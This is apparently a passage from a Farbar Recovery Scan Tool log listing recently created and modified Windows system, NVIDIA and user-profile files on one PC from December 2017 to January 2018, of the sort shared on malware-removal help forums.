2017-12-13 03:18 - 2017-11-27 04:15 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.Internal.dll
2017-12-13 03:18 - 2017-11-27 00:43 - 000618496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2017-12-13 03:18 - 2017-11-26 21:48 - 001200536 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-12-13 03:18 - 2017-11-26 21:47 - 001053592 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-12-13 03:18 - 2017-11-26 21:45 - 001642520 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2017-12-13 03:18 - 2017-11-26 21:45 - 000319352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2017-12-13 03:18 - 2017-11-26 21:45 - 000264040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-12-13 03:18 - 2017-11-26 21:45 - 000198888 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-12-13 03:18 - 2017-11-26 21:41 - 000285080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-12-13 03:18 - 2017-11-26 21:38 - 001636376 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-12-13 03:18 - 2017-11-26 21:37 - 001277848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-12-13 03:18 - 2017-11-26 21:35 - 001090440 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-12-13 03:18 - 2017-11-26 21:35 - 000924136 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-12-13 03:18 - 2017-11-26 21:33 - 002395032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-12-13 03:18 - 2017-11-26 21:33 - 001208184 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-12-13 03:18 - 2017-11-26 21:33 - 000471960 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-12-13 03:18 - 2017-11-26 21:33 - 000398744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fltMgr.sys
2017-12-13 03:18 - 2017-11-26 21:32 - 000373656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-12-13 03:18 - 2017-11-26 21:32 - 000082840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2017-12-13 03:18 - 2017-11-26 21:31 - 000187288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-12-13 03:18 - 2017-11-26 21:30 - 001488792 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 003010720 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 002573208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-12-13 03:18 - 2017-11-26 21:29 - 000891800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-12-13 03:18 - 2017-11-26 21:29 - 000840440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 000749976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-12-13 03:18 - 2017-11-26 21:29 - 000703536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 000436120 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-12-13 03:18 - 2017-11-26 21:28 - 001259344 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-12-13 03:18 - 2017-11-26 21:28 - 001012120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Services.TargetedContent.dll
2017-12-13 03:18 - 2017-11-26 21:28 - 000713624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-12-13 03:18 - 2017-11-26 21:28 - 000495000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-12-13 03:18 - 2017-11-26 21:28 - 000149400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-12-13 03:18 - 2017-11-26 21:27 - 002446744 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-12-13 03:18 - 2017-11-26 21:27 - 002412168 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-12-13 03:18 - 2017-11-26 21:27 - 001413760 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-12-13 03:18 - 2017-11-26 21:27 - 000464408 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2017-12-13 03:18 - 2017-11-26 21:27 - 000230296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-12-13 03:18 - 2017-11-26 21:26 - 000428952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2017-12-13 03:18 - 2017-11-26 21:26 - 000048112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2017-12-13 03:18 - 2017-11-26 21:25 - 000902416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2017-12-13 03:18 - 2017-11-26 21:23 - 001694224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-12-13 03:18 - 2017-11-26 21:23 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2017-12-13 03:18 - 2017-11-26 21:23 - 000754688 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2017-12-13 03:18 - 2017-11-26 21:22 - 000404888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-12-13 03:18 - 2017-11-26 21:21 - 001585376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-12-13 03:18 - 2017-11-26 21:21 - 000654048 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-12-13 03:18 - 2017-11-26 21:20 - 000615768 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-12-13 03:18 - 2017-11-26 21:20 - 000519152 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-12-13 03:18 - 2017-11-26 20:57 - 001664000 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 001289216 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-12-13 03:18 - 2017-11-26 20:55 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2017-12-13 03:18 - 2017-11-26 20:54 - 000327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-12-13 03:18 - 2017-11-26 20:54 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll
2017-12-13 03:18 - 2017-11-26 20:48 - 012829696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-12-13 03:18 - 2017-11-26 20:47 - 002890240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-12-13 03:18 - 2017-11-26 20:43 - 000239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwifimp.sys
2017-12-13 03:18 - 2017-11-26 20:35 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_ContentDeliveryManager.dll
2017-12-13 03:18 - 2017-11-26 20:35 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2017-12-13 03:18 - 2017-11-26 20:34 - 000126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptcatsvc.dll
2017-12-13 03:18 - 2017-11-26 20:33 - 000361984 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2017-12-13 03:18 - 2017-11-26 20:31 - 001495040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-12-13 03:18 - 2017-11-26 20:31 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-12-13 03:18 - 2017-11-26 20:31 - 000115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-12-13 03:18 - 2017-11-26 20:31 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2017-12-13 03:18 - 2017-11-26 20:29 - 000474112 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-12-13 03:18 - 2017-11-26 20:29 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-12-13 03:18 - 2017-11-26 20:29 - 000424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2017-12-13 03:18 - 2017-11-26 20:29 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupManager.dll
2017-12-13 03:18 - 2017-11-26 20:28 - 000394752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys
2017-12-13 03:18 - 2017-11-26 20:26 - 000830464 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9on12.dll
2017-12-13 03:18 - 2017-11-26 20:26 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-12-13 03:18 - 2017-11-26 20:26 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 001425408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000354304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000292864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExecModelClient.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-12-13 03:18 - 2017-11-26 20:23 - 000588288 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2017-12-13 03:18 - 2017-11-26 20:22 - 000720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-12-13 03:18 - 2017-11-26 20:19 - 001167360 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-12-13 03:18 - 2017-11-26 20:19 - 000887296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-12-13 03:18 - 2017-11-26 20:19 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadjcsp.dll
2017-12-13 03:18 - 2017-11-26 20:18 - 003186688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2017-12-13 03:18 - 2017-11-26 20:18 - 001424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-12-13 03:18 - 2017-11-26 20:18 - 000556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-12-13 03:18 - 2017-11-26 20:17 - 003334144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-12-13 03:18 - 2017-11-26 20:17 - 002208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-12-13 03:18 - 2017-11-26 20:17 - 001054720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-12-13 03:18 - 2017-11-26 20:08 - 017159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-12-13 03:18 - 2017-11-26 20:05 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-12-13 03:18 - 2017-11-26 20:04 - 003578368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-12-13 03:18 - 2017-11-26 20:04 - 002596352 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-12-13 03:18 - 2017-11-26 20:03 - 004772352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-12-13 03:18 - 2017-11-26 20:03 - 002783744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-12-13 03:18 - 2017-11-26 20:01 - 003163648 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-12-13 03:18 - 2017-11-26 20:00 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2017-12-13 03:18 - 2017-11-26 19:59 - 004814848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-12-13 03:18 - 2017-11-26 19:59 - 000726016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-12-13 03:18 - 2017-11-26 19:59 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2017-12-13 03:18 - 2017-11-26 19:58 - 000151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-12-13 03:18 - 2017-11-26 19:48 - 000534528 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2017-12-13 03:18 - 2017-11-26 19:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\acppage.dll
2017-12-13 03:18 - 2017-11-26 19:21 - 001474680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2017-12-13 03:18 - 2017-11-26 19:21 - 001432816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-12-13 03:18 - 2017-11-26 19:02 - 001124760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContentDeliveryManager.Utilities.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 002339296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000791960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-12-13 03:18 - 2017-11-26 19:01 - 000746904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Services.TargetedContent.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000590944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000506256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000354200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-12-13 03:18 - 2017-11-26 19:00 - 001990160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-12-13 03:18 - 2017-11-26 19:00 - 000353848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-12-13 03:18 - 2017-11-26 18:59 - 000703568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-12-13 03:18 - 2017-11-26 18:58 - 001148216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-12-13 03:18 - 2017-11-26 18:58 - 001057824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2017-12-13 03:18 - 2017-11-26 18:51 - 001558856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-12-13 03:18 - 2017-11-26 18:51 - 000661664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 002393600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 001470976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 000372224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 000133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-12-13 03:18 - 2017-11-26 18:40 - 000160256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-12-13 03:18 - 2017-11-26 18:38 - 000271872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2017-12-13 03:18 - 2017-11-26 18:37 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 013703168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 000444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 000351232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000557056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9on12.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000293888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000242176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExecModelClient.dll
2017-12-13 03:18 - 2017-11-26 18:32 - 011923456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-12-13 03:18 - 2017-11-26 18:31 - 000660480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-12-13 03:18 - 2017-11-26 18:31 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2017-12-13 03:18 - 2017-11-26 18:30 - 004385280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-12-13 03:18 - 2017-11-26 18:30 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-12-13 03:18 - 2017-11-26 18:29 - 002869760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-12-13 03:18 - 2017-11-26 18:29 - 000823808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-12-13 03:18 - 2017-11-26 18:28 - 004249600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-12-13 03:18 - 2017-11-26 18:24 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-12-13 03:18 - 2017-11-26 18:24 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acppage.dll
2017-12-13 03:18 - 2017-11-19 15:35 - 003331520 _____ C:\WINDOWS\system32\Windows.Mirage.dll
2017-12-13 03:18 - 2017-11-19 10:20 - 002491112 _____ C:\WINDOWS\SysWOW64\Windows.Mirage.dll
2017-12-12 04:49 - 2017-12-17 07:07 - 000000068 _____ C:\Users\ouroboros\AppData\Local\HvpjdXLztn
2017-12-09 12:38 - 2017-12-09 12:38 - 001079535 _____ C:\Users\ouroboros\Downloads\Stats_May_6_Lesson_10-1.pdf
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-05 10:00 - 2017-05-07 21:52 - 000000000 ____D C:\ProgramData\NVIDIA
2018-01-05 09:58 - 2016-01-24 21:20 - 000000008 __RSH C:\ProgramData\ntuser.pol
2018-01-05 09:57 - 2017-11-13 12:23 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-01-05 09:57 - 2017-09-29 16:45 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-01-05 09:56 - 2017-06-21 16:34 - 000000000 ____D C:\Users\ouroboros\AppData\LocalLow\Temp
2018-01-05 09:55 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2018-01-05 09:55 - 2015-07-10 19:04 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2018-01-05 09:46 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\DeliveryOptimization
2018-01-05 09:35 - 2017-11-13 12:23 - 000000000 ____D C:\WINDOWS\System32\Tasks\Intel
2018-01-05 09:35 - 2017-11-13 12:23 - 000000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2018-01-05 09:35 - 2017-11-10 19:11 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\discord
2018-01-05 09:35 - 2017-10-29 17:59 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\qBittorrent
2018-01-05 09:35 - 2017-09-29 21:44 - 000000000 ____D C:\WINDOWS\INF
2018-01-05 09:35 - 2016-02-01 22:08 - 000000000 ____D C:\WINDOWS\SysWOW64\SupportAppPBHostless Modem
2018-01-05 09:35 - 2015-12-25 22:39 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\TS3Client
2018-01-05 09:35 - 2015-12-22 13:17 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\vlc
2018-01-05 09:35 - 2015-11-03 03:01 - 000000000 ___HD C:\WINDOWS\system32\WLANProfiles
2018-01-05 09:28 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\registration
2018-01-05 08:52 - 2017-09-29 21:46 - 000000000 ___HD C:\Program Files\WindowsApps
2018-01-05 08:52 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-01-05 08:51 - 2015-12-26 13:28 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Adobe
2018-01-05 08:51 - 2015-12-21 08:04 - 000002495 _____ C:\Users\ouroboros\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-01-05 08:50 - 2017-11-13 12:23 - 000004176 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6BD46CFB-E054-464B-ACE5-24C6D38691EC}
2018-01-05 08:45 - 2017-11-13 12:01 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-01-04 18:00 - 2017-09-29 21:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2018-01-04 12:00 - 2017-11-13 12:23 - 000003550 _____ C:\WINDOWS\System32\Tasks\ASUS Live Update1
2018-01-04 12:00 - 2017-11-13 12:23 - 000003540 _____ C:\WINDOWS\System32\Tasks\ASUS Live Update2
2018-01-03 10:57 - 2017-11-13 12:06 - 000000000 ____D C:\Users\ouroboros
2018-01-03 10:34 - 2017-10-29 17:59 - 000000000 ____D C:\Users\ouroboros\AppData\Local\qBittorrent
2018-01-01 04:30 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-12-30 11:52 - 2016-09-25 13:58 - 000000000 ____D C:\Users\ouroboros\Documents\My Games
2017-12-22 12:43 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\rescache
2017-12-22 09:16 - 2016-01-01 09:22 - 000000000 ____D C:\Users\ouroboros\AppData\Local\UnrealEngine
2017-12-22 09:16 - 2015-11-03 02:48 - 000000000 ____D C:\ProgramData\Package Cache
2017-12-21 11:33 - 2017-05-07 21:52 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-12-21 11:32 - 2017-11-16 17:01 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:32 - 2017-11-13 12:23 - 000003940 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-05-07 21:52 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-12-21 11:31 - 2017-05-07 21:51 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-12-21 11:31 - 2016-01-18 16:53 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\NVIDIA
2017-12-21 10:13 - 2017-08-10 00:55 - 000000288 _____ C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job
2017-12-19 08:26 - 2017-09-29 21:46 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-12-19 08:25 - 2017-09-29 21:46 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2017-12-19 08:23 - 2016-05-15 23:14 - 000000000 ____D C:\Program Files\Microsoft Office
2017-12-16 19:27 - 2017-11-10 19:11 - 000002259 _____ C:\Users\ouroboros\Desktop\Discord.lnk
2017-12-16 19:27 - 2017-11-10 19:11 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2017-12-16 19:27 - 2017-11-10 19:11 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Discord
2017-12-16 08:23 - 2017-06-14 21:24 - 001615472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdagenco6420103.dll
2017-12-16 08:23 - 2017-06-14 21:24 - 000225208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys
2017-12-16 08:23 - 2017-06-14 21:21 - 004485376 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-12-16 08:23 - 2017-06-14 18:09 - 000048442 _____ C:\WINDOWS\system32\nvinfo.pb
2017-12-16 08:23 - 2017-05-14 19:36 - 002404800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-12-16 08:23 - 2017-05-14 19:36 - 002070976 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-12-16 08:23 - 2017-05-14 19:36 - 001309120 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-12-16 08:23 - 2017-05-14 19:35 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-12-16 08:23 - 2017-05-14 19:32 - 000186304 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-12-16 08:23 - 2017-05-14 19:32 - 000152512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-12-16 08:23 - 2017-05-14 19:32 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-12-16 08:23 - 2017-05-07 21:52 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
